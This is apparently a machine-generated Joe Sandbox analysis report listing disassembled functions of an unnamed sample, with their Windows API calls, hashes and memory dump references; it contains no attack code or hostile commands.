                                                                              • Instruction ID: ef235476c2886ffae3e27a3c50b3468c4ef9c2bd52294de281c12fe1e9de19ff
                                                                              • Opcode Fuzzy Hash: 734ac98a5040bfac3f94558682cac75a7c1dd0036b9839d09b0cd0c1ad7e2fa9
                                                                              • Instruction Fuzzy Hash: CDE0C236A8536CAB861073959C0A9BE7D06CB51B70B0AC022FB05912A1CBA06820D6FD
                                                                              Function 00DE1A9B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1AAD
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: 3Ro
                                                                              • API String ID: 1269201914-1492261280
                                                                              • Opcode ID: 5c1b57cd8be9139b38264c75f064ce73a7076403a339587167c980e5329de237
                                                                              • Instruction ID: 2e9fd99e0996dbca7730c6460e5fa3e7c8631fad6479c8105bbbfa92c6d60959
                                                                              • Opcode Fuzzy Hash: 5c1b57cd8be9139b38264c75f064ce73a7076403a339587167c980e5329de237
                                                                              • Instruction Fuzzy Hash: 2AB092EA359644AC32047102990A83B020CC0C0B10360552AB100A0080A4804E891036
                                                                              Function 00DE1E96 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E83
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: @Hmu Fju0:.uPou
                                                                              • API String ID: 1269201914-2480647417
                                                                              • Opcode ID: 3d13b2e16e0f309260079547167e3c51db8543f84db0ac7b29a7698330c108a6
                                                                              • Instruction ID: cf15250d2455cea03653eb4744db907f475870003a49dc80ab6c7c6413f43abf
                                                                              • Opcode Fuzzy Hash: 3d13b2e16e0f309260079547167e3c51db8543f84db0ac7b29a7698330c108a6
                                                                              • Instruction Fuzzy Hash: 35B012F6369245BE32047106EC07C3B111CF0C0F10370552EF440D01C0D4804DC10036
                                                                              Function 00DE1EB4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E83
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: 0:.uPou
                                                                              • API String ID: 1269201914-2388506183
                                                                              • Opcode ID: f9661b65a14238e6e5946f9dc6661371f2e777f83a511f0fa2bd41c259bcb41c
                                                                              • Instruction ID: 59cb1163200c51dd0b31f72f7ea32a463c481b71e8903884fc7f42912182cb5d
                                                                              • Opcode Fuzzy Hash: f9661b65a14238e6e5946f9dc6661371f2e777f83a511f0fa2bd41c259bcb41c
                                                                              • Instruction Fuzzy Hash: 03B012F6369340BD31447106DC07C3B112CE0C0F11370572EF840D01C0D5804EC1003A
                                                                              Function 00DE1EAA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E83
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: 0:.uPou
                                                                              • API String ID: 1269201914-2388506183
                                                                              • Opcode ID: a6f4280706aeb056a006e7ebc8890fdfd604e31511d37a8a153096665702c374
                                                                              • Instruction ID: 0b30634bf03dce88c8d34e0f8bc3f1b60e3ae5ff0305fd011278f081d5cffe16
                                                                              • Opcode Fuzzy Hash: a6f4280706aeb056a006e7ebc8890fdfd604e31511d37a8a153096665702c374
                                                                              • Instruction Fuzzy Hash: F7B012F6369341BD32447106EC07C3B111CE0C0F10370562EF840D01C0D4804DC10036
                                                                              Function 00DE1EA0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E83
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: Fju0:.uPou
                                                                              • API String ID: 1269201914-561048448
                                                                              • Opcode ID: 827b5435a7fe99d3e93288c639a7865b945e5523d44fd3eb0fdbede37f36d0e9
                                                                              • Instruction ID: 79153d48cc175242d2d0e8ea44d17a9c7ff14f50562411f1976309669cccc497
                                                                              • Opcode Fuzzy Hash: 827b5435a7fe99d3e93288c639a7865b945e5523d44fd3eb0fdbede37f36d0e9
                                                                              • Instruction Fuzzy Hash: DAB012F63A9281BD32047106DD07C3B111CE0C0F10370553EF440D01C0E8804EC20036
                                                                              Function 00DE1E71 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E83
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: 0:.uPou
                                                                              • API String ID: 1269201914-2388506183
                                                                              • Opcode ID: a3f3e253bf9baa2f980c6c326930bcd8719086156a20afdfde8cf788da0f4255
                                                                              • Instruction ID: 808e1b78e169bdebe34ef5d7a0d5de945ca22735e824697c6e96fb1963461308
                                                                              • Opcode Fuzzy Hash: a3f3e253bf9baa2f980c6c326930bcd8719086156a20afdfde8cf788da0f4255
                                                                              • Instruction Fuzzy Hash: 39B012F6369242BD32043152DC07C3B111CE0C0F10370992EF840E00C0A4804DC50036
                                                                              Function 00DE1E91 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 9COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00DE1E83
                                                                                • Part of subcall function 00DE2160: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00DE21D3
                                                                                • Part of subcall function 00DE2160: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00DE21E4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                              • String ID: 0:.uPou
                                                                              • API String ID: 1269201914-2388506183
                                                                              • Opcode ID: 947bd4c9cad957db1bf7cc0c914c12c6ccd94aef5d179dc6f0da9e304975f539
                                                                              • Instruction ID: 98ff65c54b909c7fdee1d6cfd93694fadb00cd5a8f09af9021f4dbbbbe7c74c9
                                                                              • Opcode Fuzzy Hash: 947bd4c9cad957db1bf7cc0c914c12c6ccd94aef5d179dc6f0da9e304975f539
                                                                              • Instruction Fuzzy Hash: C1A002B6369645BD75147152DD06C3B111DE4C4F51370591DF54194081559059951435
                                                                              Function 00DF0A0B Relevance: 3.2, APIs: 2, Instructions: 177COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00DF053A: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00DF0565
                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00DF084A,?,00000000,?,00000000,?), ref: 00DF0A6C
                                                                              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00DF084A,?,00000000,?,00000000,?), ref: 00DF0AA8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CodeInfoPageValid
                                                                              • String ID:
                                                                              • API String ID: 546120528-0
                                                                              • Opcode ID: 118f499ba3f0e0f84225469adab213bd068bf4382fa34ff1df2db76cc22fd248
                                                                              • Instruction ID: fa12f66fe338e208dcee6ae32adafcb021609ec2770d4c6bc5784bd7828574c1
                                                                              • Opcode Fuzzy Hash: 118f499ba3f0e0f84225469adab213bd068bf4382fa34ff1df2db76cc22fd248
                                                                              • Instruction Fuzzy Hash: 16512471A003498EDB20CF75C8806BABFF5EF85308F1AC16ED2868B253D6759946CB70
                                                                              Function 00DCEB71 Relevance: 3.1, APIs: 2, Instructions: 144COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(000000FF,?,?,?,?,00000000,?,?,00DCEDCC,?,?,00000000,?,?,?,00DCC9DE), ref: 00DCED05
                                                                              • GetLastError.KERNEL32(?,?,00DCEDCC,?,?,00000000,?,?,?,00DCC9DE,?,?,00000000,?,?,?), ref: 00DCED14
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 6eee4800f25bc58b7366e3aff4b3de9d0127e0eac454b3ec3ccc54786245da31
                                                                              • Instruction ID: 631ad698c1ef5e5c4a5073452dfb36b92a3a714fb45bc2878c682f6f8b4d329b
                                                                              • Opcode Fuzzy Hash: 6eee4800f25bc58b7366e3aff4b3de9d0127e0eac454b3ec3ccc54786245da31
                                                                              • Instruction Fuzzy Hash: 0041F8B16043578BD7309F29C684FBAB3A9FB84360F18491EE895C7241D774ED458BB1
                                                                              Function 00DDBCA4 Relevance: 3.1, APIs: 2, Instructions: 113COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ShowWindow.USER32(00000000,00000005,?,?,?,00DDBEFD,00000000,00000000), ref: 00DDBDA2
                                                                              • SetWindowTextW.USER32(00000000,00000000), ref: 00DDBDAC
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ShowText
                                                                              • String ID:
                                                                              • API String ID: 1551406749-0
                                                                              • Opcode ID: 61d95937bb0fa85521a92f80a2c49cff01c0a5fd77dc3ed21cb458b13086f8fd
                                                                              • Instruction ID: 949215c3094f1af46adad77053bb3546d9d25309fc9187258c8646e9a88d9b1b
                                                                              • Opcode Fuzzy Hash: 61d95937bb0fa85521a92f80a2c49cff01c0a5fd77dc3ed21cb458b13086f8fd
                                                                              • Instruction Fuzzy Hash: 4B318931305716AFC704EF59EC8492ABBAABF48728B05851FF60697360CB61BC05CBB5
                                                                              Function 00DE7482 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FreeLibrary.KERNEL32(00000000,?,00E09120,?,?,?,00DE7676,00000004,InitializeCriticalSectionEx,00DFC504,InitializeCriticalSectionEx,00000000,?,00DE742D,00E09120,00000FA0), ref: 00DE7505
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00DE750F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: AddressFreeLibraryProc
                                                                              • String ID:
                                                                              • API String ID: 3013587201-0
                                                                              • Opcode ID: 754b7f0f517646fa3f371128f17b1c29020acb72eb0c638295cf8d46807d302f
                                                                              • Instruction ID: db80b5fb42a4a08e8b8e9567bb4f0a827425051fa1b267262ed7e98d6f397aba
                                                                              • Opcode Fuzzy Hash: 754b7f0f517646fa3f371128f17b1c29020acb72eb0c638295cf8d46807d302f
                                                                              • Instruction Fuzzy Hash: 5611D3316092569FCF67EFA6EC808AE77A5FB453607280155E906DB390E730DD41CBB0
                                                                              Function 00DCED30 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 00DCED77
                                                                              • GetLastError.KERNEL32 ref: 00DCED84
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastPointer
                                                                              • String ID:
                                                                              • API String ID: 2976181284-0
                                                                              • Opcode ID: 29a9476d8e75835281f50fc109959750abd5bf25dd7d989d73dc3fcaecc72ec8
                                                                              • Instruction ID: 6e1624d573f62c3856118493ae7df42c9d0276b9547d3b64e1df034160d376e7
                                                                              • Opcode Fuzzy Hash: 29a9476d8e75835281f50fc109959750abd5bf25dd7d989d73dc3fcaecc72ec8
                                                                              • Instruction Fuzzy Hash: 0A11C8B46013069BE720D665CC44FAAB7A9DB05370F284A1DE453D35D0D7B4EE46C770
                                                                              Function 00DC22BE Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog3_Item
                                                                              • String ID:
                                                                              • API String ID: 1946455446-0
                                                                              • Opcode ID: a030634276dd925d159e7e8d7c02c92b7b9e399207cfffa8a45f3d480897f49e
                                                                              • Instruction ID: 7fb95c781adf5ea985c05690ab8a039b299cad12ca87ee2d7d3232844997f1a9
                                                                              • Opcode Fuzzy Hash: a030634276dd925d159e7e8d7c02c92b7b9e399207cfffa8a45f3d480897f49e
                                                                              • Instruction Fuzzy Hash: 1CF0DC74A0022A4AD705EBA8C892FBD72A8DF01700F14801CFA11AB1D2DBA45A42CA79
                                                                              Function 00DD6F84 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(02000000,?,00000002,00000002,?,00DD6FC7,00DD08DA), ref: 00DD6F91
                                                                              • GetProcessAffinityMask.KERNEL32(00000000,?,00DD6FC7), ref: 00DD6F98
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Process$AffinityCurrentMask
                                                                              • String ID:
                                                                              • API String ID: 1231390398-0
                                                                              • Opcode ID: bcbff6b95daa60987a3b21b9f636c2e6b252ff465cf8eabd1d60aa269a42b99f
                                                                              • Instruction ID: 6aa448544122818fce962df41a4c6fb2c7cc64007359a8c2a80cc3bbc2dfd3d9
                                                                              • Opcode Fuzzy Hash: bcbff6b95daa60987a3b21b9f636c2e6b252ff465cf8eabd1d60aa269a42b99f
                                                                              • Instruction Fuzzy Hash: EFE09232B00605678F198BB8AC058EB72EDDE54214714807BE513D3704EE34ED0646F0
                                                                              Function 00DD400C Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringW.USER32(000000C9,-00E0F54B,00000400,000000C9), ref: 00DD4034
                                                                              • LoadStringW.USER32(000000C9,-00E0F54B,00000400), ref: 00DD4047
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString
                                                                              • String ID:
                                                                              • API String ID: 2948472770-0
                                                                              • Opcode ID: 86e3d364c62a1f726d5e90ffda69d07ce31b1f2dafc14522786c56abf2d92527
                                                                              • Instruction ID: 3f798efeba807eed11079cd39e9618276ae8243ef3cfc8f990076977f5d61a52
                                                                              • Opcode Fuzzy Hash: 86e3d364c62a1f726d5e90ffda69d07ce31b1f2dafc14522786c56abf2d92527
                                                                              • Instruction Fuzzy Hash: E2E012B26121507BDA201F77EC4DDA7AE6CDFA27A5B048037B644A3271D6314C55C2B4
                                                                              Function 00DDD1CB Relevance: 3.0, APIs: 2, Instructions: 31COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00DF8950,000000FF), ref: 00DDD209
                                                                              • CoUninitialize.COMBASE(?,?,?,00DF8950,000000FF), ref: 00DDD20F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
